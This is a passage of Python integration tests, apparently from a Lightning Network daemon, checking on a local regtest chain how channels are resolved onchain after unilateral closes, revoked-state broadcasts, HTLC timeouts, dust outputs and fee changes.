    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # Now we really mess things up! (broadcast the now-revoked snapshot)
    bitcoind.rpc.sendrawtransaction(tx)
    bitcoind.generate_block(1)

    l2.daemon.wait_for_log(' to ONCHAIN')
    # FIXME: l1 should try to stumble along!

    # l2 should spend all of the outputs (except to-us).
    # Could happen in any order, depending on commitment tx.
    # Rewind logsearch_start between waits so order doesn't matter.
    needle = l2.daemon.logsearch_start
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')

    l2.daemon.logsearch_start = needle
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/OUR_HTLC')

    l2.daemon.logsearch_start = needle
    l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')

    # FIXME: test HTLC tx race!

    # 100 blocks later, all resolved.
    bitcoind.generate_block(100)

    wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)

    outputs = l2.rpc.listfunds()['outputs']
    assert [o['status'] for o in outputs] == ['confirmed'] * 3

    # Allow some lossage for fees.
    assert sum(o['value'] for o in outputs) < 10**6
    assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
    """Onchain handling where funder immediately drops to chain"""
    # The opener disconnects right after WIRE_FUNDING_LOCKED and then
    # permanently fails, forcing a unilateral close on the first commitment.
    opener = node_factory.get_node(disconnect=['+WIRE_FUNDING_LOCKED', 'permfail'])
    # Make locktime different, as we once had them reversed!
    peer = node_factory.get_node(options={'watchtime-blocks': 10})
    opener.fundwallet(10**7)
    opener.rpc.connect(peer.info['id'], 'localhost', peer.port)

    opener.rpc.fundchannel(peer.info['id'], 10**6)
    opener.daemon.wait_for_log('sendrawtx exit 0')

    opener.bitcoin.generate_block(1)

    # The opener drops its commitment to chain.
    opener.daemon.wait_for_log('permfail')
    opener.daemon.wait_for_log('sendrawtx exit 0')
    opener.bitcoin.generate_block(1)
    opener.daemon.wait_for_log(' to ONCHAIN')
    peer.daemon.wait_for_log(' to ONCHAIN')

    # 10 later, the opener should collect its to-self payment.
    bitcoind.generate_block(10)
    opener.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                       'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # 94 later, the peer is done.
    bitcoind.generate_block(94)
    peer.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Now, 100 blocks and the opener should be done too.
    bitcoind.generate_block(6)
    opener.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
    """Onchaind should not watch random spends"""
    l1, l2 = node_factory.line_graph(2)

    l1.pay(l2, 200000000)

    # Force a unilateral close from l1's side.
    l1.rpc.dev_fail(l2.info['id'])
    l1.daemon.wait_for_log('Failing due to dev-fail command')
    l1.wait_for_channel_onchain(l2.info['id'])

    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # 10 later, l1 should collect its to-self payment.
    bitcoind.generate_block(10)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # First time it sees it, onchaind cares.
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
                           'OUR_DELAYED_RETURN_TO_WALLET')

    # Now test unrelated onchain churn.
    # Daemon gets told about wallet; says it doesn't care.
    l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log("but we don't care")

    # And lightningd should respect that!
    assert not l1.daemon.is_in_log("Can't unwatch txid")

    # So these should not generate further messages
    for i in range(5):
        l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
        bitcoind.generate_block(1)
        # Make sure it digests the block
        sync_blockheight(bitcoind, [l1])

    # We won't see this again (only scan logs written after the last wait).
    assert not l1.daemon.is_in_log("but we don't care",
                                   start=l1.daemon.logsearch_start)

    # Note: for this test we leave onchaind running, so we can detect
    # any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
    """Restarting a node must replay stored channel txs and resume onchaind."""
    disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
    # Long watchtime/cltv so the channel is still unresolved after 100 blocks.
    options = {'watchtime-blocks': 201, 'cltv-delta': 101}
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(options=options)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)
    rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
    routestep = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 101,
        'channel': '1x1x1'
    }
    l1.rpc.sendpay([routestep], rhash)
    l1.daemon.wait_for_log('sendrawtx exit 0')
    bitcoind.generate_block(1)

    # Wait for nodes to notice the failure, this search needle is after the
    # DB commit so we're sure the tx entries in onchaindtxs have been added
    l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
    l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")

    # We should at least have the init tx now
    assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
    assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0

    # Generate some blocks so we restart the onchaind from DB (we rescan
    # last_height - 100)
    bitcoind.generate_block(100)
    sync_blockheight(bitcoind, [l1, l2])

    # l1 should still have a running onchaind
    assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0

    l2.rpc.stop()
    l1.restart()

    # Can't wait for it, it's after the "Server started" wait in restart()
    assert l1.daemon.is_in_log(r'Restarting onchaind for channel')

    # l1 should still notice that the funding was spent and that we should react to it
    l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
    sync_blockheight(bitcoind, [l1])
    bitcoind.generate_block(10)
    sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
    """Onchain handling of outgoing dust htlcs (they should fail)"""
    # HTLC 1->2, 1 fails after it's irrevocably committed
    disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node()

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # Must be dust!  (1 msat is below the dust limit, so the HTLC gets no
    # output in the commitment tx.)
    rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
    routestep = {
        'msatoshi': 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    l1.rpc.sendpay([routestep], rhash)
    payfuture = executor.submit(l1.rpc.waitsendpay, rhash)

    # l1 will drop to chain.
    l1.daemon.wait_for_log('permfail')
    l1.wait_for_channel_onchain(l2.info['id'])
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)

    # It should fail: a dust HTLC simply isn't in the commitment tx.
    with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
        payfuture.result(5)

    # Retry payment, this should fail (and, as a side-effect, tickle a
    # bug).
    with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
        l1.rpc.sendpay([routestep], rhash)

    # 6 later, l1 should collect its to-self payment.
    bitcoind.generate_block(6)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # 94 later, l2 is done.
    bitcoind.generate_block(94)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Restart l1, it should not crash!
    l1.restart()

    # Now, 100 blocks and l1 should be done.
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
    """Onchain handling of outgoing failed htlcs"""
    # HTLC 1->2, 1 fails just after it's irrevocably committed
    disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node()

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
    # We underpay, so it fails.
    routestep = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    # First attempt fails immediately (underpaid invoice).
    l1.rpc.sendpay([routestep], rhash)
    with pytest.raises(RpcError):
        l1.rpc.waitsendpay(rhash)

    # Make sure CLTVs are different, in case it confuses onchaind.
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, [l1])

    # Second one will cause drop to chain.
    l1.rpc.sendpay([routestep], rhash)
    payfuture = executor.submit(l1.rpc.waitsendpay, rhash)

    # l1 will drop to chain.
    l1.daemon.wait_for_log('permfail')
    l1.wait_for_channel_onchain(l2.info['id'])
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Wait for timeout.
    l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
                             'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
    bitcoind.generate_block(4)

    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    bitcoind.generate_block(1)
    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                   'OUR_UNILATERAL/OUR_HTLC')

    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)

    # It should fail.
    with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
        payfuture.result(5)

    # 2 later, l1 spends HTLC (5 blocks total).
    bitcoind.generate_block(2)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')

    # 89 later, l2 is done.
    bitcoind.generate_block(89)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Now, 100 blocks and l1 should be done.
    bitcoind.generate_block(10)
    sync_blockheight(bitcoind, [l1])
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
    """Middle hop drops to chain holding a preimage; it must fulfill onchain.

    HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3, so l2 must
    broadcast an HTLC-success tx and l1 must learn the preimage from chain.
    """
    disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
    l1 = node_factory.get_node()
    l2 = node_factory.get_node(disconnect=disconnects)
    l3 = node_factory.get_node()

    # l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
    l2.fund_channel(l1, 10**6)
    c23 = l2.fund_channel(l3, 10**6)

    # Make sure routes finalized.
    bitcoind.generate_block(5)
    l1.wait_channel_active(c23)

    # Give l1 some money to play with.
    l2.pay(l1, 2 * 10**8)

    # Must be bigger than dust!
    rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']

    route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
    assert len(route) == 2

    # Run the payment in a background thread; it blocks until l2's
    # onchain fulfill propagates the preimage back to l1.
    q = queue.Queue()

    def try_pay():
        try:
            l1.rpc.sendpay(route, rhash)
            l1.rpc.waitsendpay(rhash)
            q.put(None)
        except Exception as err:
            q.put(err)

    t = threading.Thread(target=try_pay)
    t.daemon = True
    t.start()

    # l2 will drop to chain.
    l2.daemon.wait_for_log('sendrawtx exit 0')
    l1.bitcoin.generate_block(1)
    l2.daemon.wait_for_log(' to ONCHAIN')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')

    # l2 should fulfill HTLC onchain, and spend to-us (any order)
    l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
                                   'OUR_UNILATERAL/THEIR_HTLC')

    # Payment should succeed.
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
    err = q.get(timeout=10)
    if err:
        print("Got err from sendpay thread")
        raise err
    t.join(timeout=1)
    # Thread.isAlive() was removed in Python 3.9; is_alive() is the
    # correct spelling.
    assert not t.is_alive()

    # Three more, l2 can spend to-us.
    bitcoind.generate_block(3)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # One more block, HTLC tx is now spendable.
    l1.bitcoin.generate_block(1)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')

    # 100 blocks after last spend, l2 should be done.
    l1.bitcoin.generate_block(100)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
    """Onchain handling when we restart with different fees"""
    # HTLC 1->2, 2 fails just after they're both irrevocably committed
    # We need 2 to drop to chain, because then 1's HTLC timeout tx
    # is generated on-the-fly, and is thus feerate sensitive.
    disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
    l1 = node_factory.get_node(may_reconnect=True)
    l2 = node_factory.get_node(disconnect=disconnects,
                               may_reconnect=True)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
    # We underpay, so it fails.
    routestep = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    executor.submit(l1.rpc.sendpay, [routestep], rhash)

    # l2 will drop to chain.
    l2.daemon.wait_for_log('permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Wait for timeout.
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
    bitcoind.generate_block(6)

    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                   'THEIR_UNILATERAL/OUR_HTLC')

    # Make sure that gets included.
    bitcoind.generate_block(1)

    # Now we restart with different feerates.
    l1.stop()
    l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
    l1.start()

    # We recognize different proposal as ours: the fee changed, but the
    # resolution must still be attributed to our own broadcast.
    l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')

    # We use 3 blocks for "reasonable depth", so add two more
    bitcoind.generate_block(2)

    # Note that the very similar test_onchain_timeout looks for a
    # different string: that's because it sees the JSONRPC response,
    # and due to the l1 restart, there is none here.
    l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')

    # 90 later, l2 is done
    bitcoind.generate_block(89)
    sync_blockheight(bitcoind, [l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Now, 7 blocks and l1 should be done.
    bitcoind.generate_block(6)
    sync_blockheight(bitcoind, [l1])
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
    """Onchain handling when we reduce output to all dust"""
    # HTLC 1->2, 2 fails just after they're both irrevocably committed
    # We need 2 to drop to chain, because then 1's HTLC timeout tx
    # is generated on-the-fly, and is thus feerate sensitive.
    disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=disconnects)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
    # We underpay, so it fails.
    routestep = {
        'msatoshi': 10**7 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    executor.submit(l1.rpc.sendpay, [routestep], rhash)

    # l2 will drop to chain.
    l2.daemon.wait_for_log('permfail')
    l2.wait_for_channel_onchain(l1.info['id'])

    # Make l1's fees really high (and wait for it to exceed 50000), so
    # the would-be HTLC timeout output is consumed entirely by fees.
    l1.set_feerates((100000, 100000, 100000))
    l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Wait for timeout.
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
    bitcoind.generate_block(5)

    l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
                                   'THEIR_UNILATERAL/OUR_HTLC')
    l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')

    # 100 deep and l2 forgets.
    bitcoind.generate_block(93)
    sync_blockheight(bitcoind, [l1, l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # l1 does not wait for ignored payment.
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
    """Onchain handling when we've had a range of fees"""
    l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
                                     opts={'may_reconnect': True})

    # l2 sits on the HTLCs so they stay pending across feerate changes.
    l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
    p1 = executor.submit(l1.pay, l2, 1000000000)
    l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')

    l1.set_feerates((16000, 7500, 3750))
    p2 = executor.submit(l1.pay, l2, 900000000)
    l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')

    # Restart with different feerate for second HTLC.
    l1.set_feerates((5000, 5000, 3750))
    l1.restart()
    l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')

    p3 = executor.submit(l1.pay, l2, 800000000)
    l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')

    # Drop to chain
    l1.rpc.dev_fail(l2.info['id'])
    l1.wait_for_channel_onchain(l2.info['id'])

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Both sides should have correct feerate (the full range seen above).
    assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
        'min_possible_feerate': 5000,
        'max_possible_feerate': 16000
    }]
    assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
        'min_possible_feerate': 5000,
        'max_possible_feerate': 16000
    }]

    bitcoind.generate_block(5)
    # Three HTLCs, and one for the to-us output.
    l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)

    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)

    # All three payments fail: the HTLCs timed out onchain.
    with pytest.raises(Exception):
        p1.result(10)
    with pytest.raises(Exception):
        p2.result(10)
    with pytest.raises(Exception):
        p3.result(10)

    # Two more for HTLC timeout tx to be spent.
    bitcoind.generate_block(2)
    l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(100)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
    """Permanent failure with two possible commitments: peer uses the new one."""
    # Test case where we have two possible commits: it will use new one.
    disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=disconnects)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # This will fail at l2's end.
    t = executor.submit(l1.pay, l2, 200000000)

    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    # l1 must recognize l2 broadcast the *newer* commitment.
    l1.daemon.wait_for_log('Their unilateral tx, new commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')

    # OK, time out HTLC.
    bitcoind.generate_block(5)
    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                   'THEIR_UNILATERAL/OUR_HTLC')

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
    l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')

    t.cancel()

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(100)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
    """Build a 7-node line with multiple same-hash HTLCs pending in each direction.

    Returns (payment_hash, nodes).  Used by the multihtlc onchain tests.
    """
    # l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
    # l1 and l7 ignore any HTLCs they're sent.
    # For each direction, we create these HTLCs with same payment_hash:
    #   1 failed (CLTV1)
    #   1 failed (CLTV2)
    #   2 live (CLTV2)
    #   1 live (CLTV3)
    nodes = node_factory.line_graph(7, wait_for_announce=True,
                                    opts={'dev-no-reconnect': None,
                                          'may_reconnect': True})

    # Balance by pushing half the funds.
    b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
    nodes[0].rpc.pay(b11)

    nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
    nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)

    # Same preimage (hence same payment_hash) at both ends of the line.
    preimage = "0" * 64
    h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
                             preimage=preimage)['payment_hash']
    nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
                          preimage=preimage)['payment_hash']

    # First, the failed attempts (paying wrong node). CLTV1
    r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
    nodes[0].rpc.sendpay(r, h)
    with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
        nodes[0].rpc.waitsendpay(h)

    r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
    nodes[-1].rpc.sendpay(r, h)
    with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
        nodes[-1].rpc.waitsendpay(h)

    # Now increment CLTV -> CLTV2
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, nodes)

    # Now, the live attempts with CLTV2 (blackholed by end nodes)
    r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[0].rpc.sendpay(r, h)
    r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-1].rpc.sendpay(r, h)

    # We send second HTLC from different node, since they refuse to send
    # multiple with same hash.
    r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[1].rpc.sendpay(r, h)
    r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-2].rpc.sendpay(r, h)

    # Now increment CLTV -> CLTV3.
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, nodes)

    r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[2].rpc.sendpay(r, h)
    r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-3].rpc.sendpay(r, h)

    # Make sure HTLCs have reached the end.
    nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
    nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)

    return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
    """Node pushes a channel onchain with multiple HTLCs with same payment_hash """
    h, nodes = setup_multihtlc_test(node_factory, bitcoind)

    mid = len(nodes) // 2

    for i in range(len(nodes) - 1):
        assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']

    # Now midnode goes onchain with n+1 channel.
    nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
    nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log(' to ONCHAIN')
    nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')

    # Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
    # In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
    nodes[0].restart()
    nodes[-1].restart()

    # We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
    nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
    nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)

    # Wait for HTLCs to stabilize.
    nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')

    # After at depth 5, midnode will spend its own to-self output.
    bitcoind.generate_block(4)
    nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                           'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # The three outgoing HTLCs time out at 21, 21 and 22 blocks.
    bitcoind.generate_block(16)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')
